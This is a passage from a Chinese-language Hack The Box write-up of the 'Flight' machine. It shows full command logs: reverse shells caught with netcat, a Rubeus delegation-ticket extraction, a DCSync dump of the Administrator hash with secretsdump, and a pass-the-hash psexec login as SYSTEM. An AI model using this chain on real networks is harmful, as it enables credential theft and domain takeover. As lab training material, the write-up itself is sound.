AGIAeQB0AGUALAAwACwAJABzAGUAbgBkAGIAeQB0AGUALgBMAGUAbgBnAHQAaAApADsAJABzAHQAcgBlAGEAbQAuAEYAbAB1AHMAaAAoACkAfQA7ACQAYwBsAGkAZQBuAHQALgBDAGwAbwBzAGUAKAApAA=="


┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 8888
listening on [any] 8888 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.187] 50050

PS C:\temp> whoami
nt authority\system
PS C:\temp> cd C:/Users/Administrator/Desktop
PS C:\Users\Administrator\Desktop> ls


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/14/2024 6:41 AM 34 root.txt


PS C:\Users\Administrator\Desktop> cat root.txt
9ac6b138706bc54895687e8cbd4eb9de
PS C:\Users\Administrator\Desktop>

42、搞了这么多的土豆,发现还是老烂土豆好用啊 = = !

43、这里查看了下官方的演练报告,其实这个方法是非预期的提权方法, 正确的应该是一旦攻击者以 Microsoft 虚拟帐户的身份执行命令,他就能够运行 Rubeus 来获取机器帐户的票证,该票证可用于执行 DCSync 攻击,最终获得管理员用户的哈希值。

44、因为这里是域环境,所以还得构造下预期的方式获取。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.45] from (UNKNOWN) [10.10.11.187] 50099

PS C:\windows\system32\inetsrv> whoami
iis apppool\defaultapppool
PS C:\windows\system32\inetsrv> cd C:/temp
PS C:\temp> ls


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/14/2024 7:13 AM 57344 g.exe
-a---- 5/14/2024 7:05 AM 347648 j.exe
-a---- 5/14/2024 7:00 AM 27136 P.exe
-a---- 5/14/2024 7:07 AM 7168 shell.exe


PS C:\temp> del j.exe
PS C:\temp> del p.exe
PS C:\temp> del shell.exe
PS C:\temp> ls


Directory: C:\temp


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/14/2024 7:13 AM 57344 g.exe


PS C:\temp>

45、要创建票证,我将使用以下tgtdeleg命令:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
PS C:\temp> ./R.exe tgtdeleg /nowrap

______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.6.4


[*] Action: Request Fake Delegation TGT (current user)

[*] No target SPN specified, attempting to build 'cifs/dc.domain.com'
[*] Initializing Kerberos GSS-API w/ fake delegation for target 'cifs/g0.flight.htb'
[+] Kerberos GSS-API initialization success!
[+] Delegation requset success! AP-REQ delegation ticket is now in GSS-API output.
[*] Found the AP-REQ delegation ticket in the GSS-API output.
[*] Authenticator etype: aes256_cts_hmac_sha1
[*] Extracted the service ticket session key from the ticket cache: VIFYYHNz1VM2O1esGMOiYiKZ8h1eQx3W1gWPu+V+vwg=
[+] Successfully decrypted the authenticator
[*] base64(ticket.kirbi):

doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECpetkTTLvvm9Fvj3Csx/UNs1465pFUjsl/CujhVOPdp/hh10ppPQ3BQIlEWkg7nImhglhteTlrGc1aEuySrk0JjL4zjVYQ2J6q7rExB/AmbF9RFGm1+EvKulrxzK0yZbOjUgz4fiUYXHLgfl0+UShP1AVKZGRBQeMqgwKddlVEEIO2rk0uMoWWl7hn2vjaRMdgRwnsFFvLHZbyQhok+VgqodeTDU5pyxiyV0bkihSwQjHVjW/YIuwFQpCt6uuX/i5mzzLA73fWLqVK4ItM1tMwL0oPTy3yF9hDFk7J4PhIB8mvdLMUE7dB+7dnf6usavTG07PQbBrmVW0t8l7MS8PX0AThD2E0yBfvOBWalhn/eLyBgNsNtpQLO7PKjJu/8nSV2TMYXmAJDFcagupU9S26fwfb1fA4FZxlLnJ+mh1ZZmYXmeNinMr/QcSuuIU4W+zPCYtL7epGvei6nvshsNExTv7E9WDzj+gjfdkw8yerfcrfW46UrOIdSZ0d4nTo9zu9ye83K1xSJnYp4YsGXenW99s3PtVrNMoQfpOjy3VA5oeD44JtGafg1zAzlpfD3gwlBBvbDvdwd/TcjxWJSOnrrP3lCNk/QtFbXJOD1L+wR/D6XprmAF+k6CxLJsR85WumYIYRIZIsEH6oDmwJg1zM8ZOgQR0fRP5X3ImlBMxBTqTUeQRRw6h1mdBKuQBP0T4GtgO420J4mms5RgTF0CGYLxjDvNZ/Efza/vLZDc/kGhyQBb8dCBjkaH3Bnv+wymm2Rsq8xNXvtdpffhIQAN7l3y9JgKjrQ+xlP0uvrvtjHlrGT/pH4+w6pKfB4AT01fjqaLVg6P8m4BlUMH1z/U7bVlME3cmXkyE8+QLZH6KD8cPuXXGjys522rZhPZNSyhvSee9im1wUAJPjzJFFUXR70SX/cOtLQ8/OjWJw3ey3IDYrw6c7XNlmpoLgzDtYUBGQKVVm94lNmVlEN2Z/vliLBGhbhNtYsecpLZDdqcQGlkftqRun2yjsK//BLDI8YNt/8oCfK/UwI6/nYvNkTFx388NvwpMge5SPGl4WID2oOAadzGNV6d2YHrA6GNO+22KzuwKQlMYSvOqRJPa+JsRefmx0POXsgDXGW/SCJOn+nfvYGbtfqebDeieDYPOGNLlWxiHg4jFJ6pJCJQTBWT8cKXvfap5gq+48HeKoyNo2vbO6HP90ws0APphdk2ryCyQPsABMx14dFaXyVKFT+b1+q2IXpomFYksPo4PP+cXk9kUojynYXGnGZMggsDIp2coFHLsunkJG+F2prNKH4Hab7J2x5aafFI7+HNNn9Z5tWxY8qMGqNH1f3OQ2KpTYr3IKMgllkgpjUNsHrR4011hEet4k+n3IhJyi6Oo4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgomnx6INqZakEMag9PQnWkM1PL4PKCOVFfV/4hUiExbuhDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI0MDUxNDE0MjYxNlqmERgPMjAyNDA1MTUwMDI2MTZapxEYDzIwMjQwNTIxMTQyNjE2WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC
PS C:\temp>

46、直流同步,配置 Kerberos 票证,有了机器帐户的票证,我可以进行 DCSync 攻击,有效地告诉 DC 我想将其中的所有信息复制给自己。为此,我需要在虚拟机上配置 Kerberos 以使用我刚刚转储的票证。我将解码 Base64 票据并将其另存为ticket.kirbi.然后kirbi2ccache将其转换为我的Linux系统所需的格式:

1
2
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "doIFVDCCBVCgAwIBBaEDAgEWooIEZDCCBGBhggRcMIIEWKADAgEFoQwbCkZMSUdIVC5IVEKiHzAdoAMCAQKhFjAUGwZrcmJ0Z3QbCkZMSUdIVC5IVEKjggQgMIIEHKADAgESoQMCAQKiggQOBIIECpetkTTLvvm9Fvj3Csx/UNs1465pFUjsl/CujhVOPdp/hh10ppPQ3BQIlEWkg7nImhglhteTlrGc1aEuySrk0JjL4zjVYQ2J6q7rExB/AmbF9RFGm1+EvKulrxzK0yZbOjUgz4fiUYXHLgfl0+UShP1AVKZGRBQeMqgwKddlVEEIO2rk0uMoWWl7hn2vjaRMdgRwnsFFvLHZbyQhok+VgqodeTDU5pyxiyV0bkihSwQjHVjW/YIuwFQpCt6uuX/i5mzzLA73fWLqVK4ItM1tMwL0oPTy3yF9hDFk7J4PhIB8mvdLMUE7dB+7dnf6usavTG07PQbBrmVW0t8l7MS8PX0AThD2E0yBfvOBWalhn/eLyBgNsNtpQLO7PKjJu/8nSV2TMYXmAJDFcagupU9S26fwfb1fA4FZxlLnJ+mh1ZZmYXmeNinMr/QcSuuIU4W+zPCYtL7epGvei6nvshsNExTv7E9WDzj+gjfdkw8yerfcrfW46UrOIdSZ0d4nTo9zu9ye83K1xSJnYp4YsGXenW99s3PtVrNMoQfpOjy3VA5oeD44JtGafg1zAzlpfD3gwlBBvbDvdwd/TcjxWJSOnrrP3lCNk/QtFbXJOD1L+wR/D6XprmAF+k6CxLJsR85WumYIYRIZIsEH6oDmwJg1zM8ZOgQR0fRP5X3ImlBMxBTqTUeQRRw6h1mdBKuQBP0T4GtgO420J4mms5RgTF0CGYLxjDvNZ/Efza/vLZDc/kGhyQBb8dCBjkaH3Bnv+wymm2Rsq8xNXvtdpffhIQAN7l3y9JgKjrQ+xlP0uvrvtjHlrGT/pH4+w6pKfB4AT01fjqaLVg6P8m4BlUMH1z/U7bVlME3cmXkyE8+QLZH6KD8cPuXXGjys522rZhPZNSyhvSee9im1wUAJPjzJFFUXR70SX/cOtLQ8/OjWJw3ey3IDYrw6c7XNlmpoLgzDtYUBGQKVVm94lNmVlEN2Z/vliLBGhbhNtYsecpLZDdqcQGlkftqRun2yjsK//BLDI8YNt/8oCfK/UwI6/nYvNkTFx388NvwpMge5SPGl4WID2oOAadzGNV6d2YHrA6GNO+22KzuwKQlMYSvOqRJPa+JsRefmx0POXsgDXGW/SCJOn+nfvYGbtfqebDeieDYPOGNLlWxiHg4jFJ6pJCJQTBWT8cKXvfap5gq+48HeKoyNo2vbO6HP90ws0APphdk2ryCyQPsABMx14dFaXyVKFT+b1+q2IXpomFYksPo4PP+cXk9kUojynYXGnGZMggsDIp2coFHLsunkJG+F2prNKH4Hab7J2x5aafFI7+HNNn9Z5tWxY8qMGqNH1f3OQ2KpTYr3IKMgllkgpjUNsHrR4011hEet4k+n3IhJyi6Oo4HbMIHYoAMCAQCigdAEgc19gcowgceggcQwgcEwgb6gKzApoAMCARKhIgQgomnx6INqZakEMag9PQnWkM1PL4PKCOVFfV/4hUiExbuhDBsKRkxJR0hULkhUQqIQMA6gAwIBAaEHMAUbA0cwJKMHAwUAYKEAAKURGA8yMDI0MDUxNDE0MjYxNlqmERgPMjAyNDA1MTUwMDI2MTZapxEYDzIwMjQwNTIxMTQyNjE2WqgMGwpGTElHSFQuSFRCqR8wHaADAgECoRYwFBsGa3JidGd0GwpGTElHSFQuSFRC" | base64 -d > ticket.kirbi

47、使用 minikerberos-kirbi2ccache 进行票据格式转换

https://github.com/skelsec/minikerberos

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ minikerberos-kirbi2ccache ticket.kirbi ticket.ccache
INFO:root:Parsing kirbi file /home/kali/Desktop/ticket.kirbi
INFO:root:Done!

48、开始利用

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(kali㉿offsec)-[~/Desktop]
└─$ export KRB5CCNAME=ticket.ccache

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo ntpdate 10.10.11.187
2024-05-14 22:39:56.839148 (+0800) +26.508625 +/- 0.050886 10.10.11.187 s1 no-leap
CLOCK: time stepped by 26.508625

┌──(kali㉿offsec)-[~/Desktop]
└─$ export KRB5CCNAME=ticket.ccache

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
[-] 'NoneType' object has no attribute 'getRemoteHost'
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...

49、失败了,看来是参数不对,我换下参数,继续试下

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -k -no-pass g0.flight.htb -just-dc-user administrator -target-ip 10.10.11.187
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:08c3eb806e4a83cdc660a54970bf3f3043256638aea2b62c317feffb75d89322
Administrator:aes128-cts-hmac-sha1-96:735ebdcaa24aad6bf0dc154fcdcb9465
Administrator:des-cbc-md5:c7754cb5498c2a2f
[*] Cleaning up...

50、下面验证下密码的有效性

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec winrm flight.htb -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c'
SMB flight.htb 5985 G0 [*] Windows 10.0 Build 17763 (name:G0) (domain:flight.htb)
HTTP flight.htb 5985 G0 [*] http://flight.htb:5985/wsman
WINRM flight.htb 5985 G0 [-] flight.htb\administrator:43bbfc530bab76141b12c8446e30c17c

┌──(kali㉿offsec)-[~/Desktop]
└─$ crackmapexec smb flight.htb -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c'
SMB flight.htb 445 G0 [*] Windows 10.0 Build 17763 x64 (name:G0) (domain:flight.htb) (signing:True) (SMBv1:False)
SMB flight.htb 445 G0 [+] flight.htb\administrator:43bbfc530bab76141b12c8446e30c17c (Pwn3d!)

51、那直接登录吧,看看权限,就结束了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-psexec Administrator@flight.htb -hashes aad3b435b51404eeaad3b435b51404ee:43bbfc530bab76141b12c8446e30c17c
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on flight.htb.....
[*] Found writable share ADMIN$
[*] Uploading file OTuhARFe.exe
[*] Opening SVCManager on flight.htb.....
[*] Creating service pCkW on flight.htb.....
[*] Starting service pCkW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/510


Flight-htb-writeup
https://sh1yan.top/2024/05/15/Flight-htb-writeup/
作者
shiyan
发布于
2024年5月15日
许可协议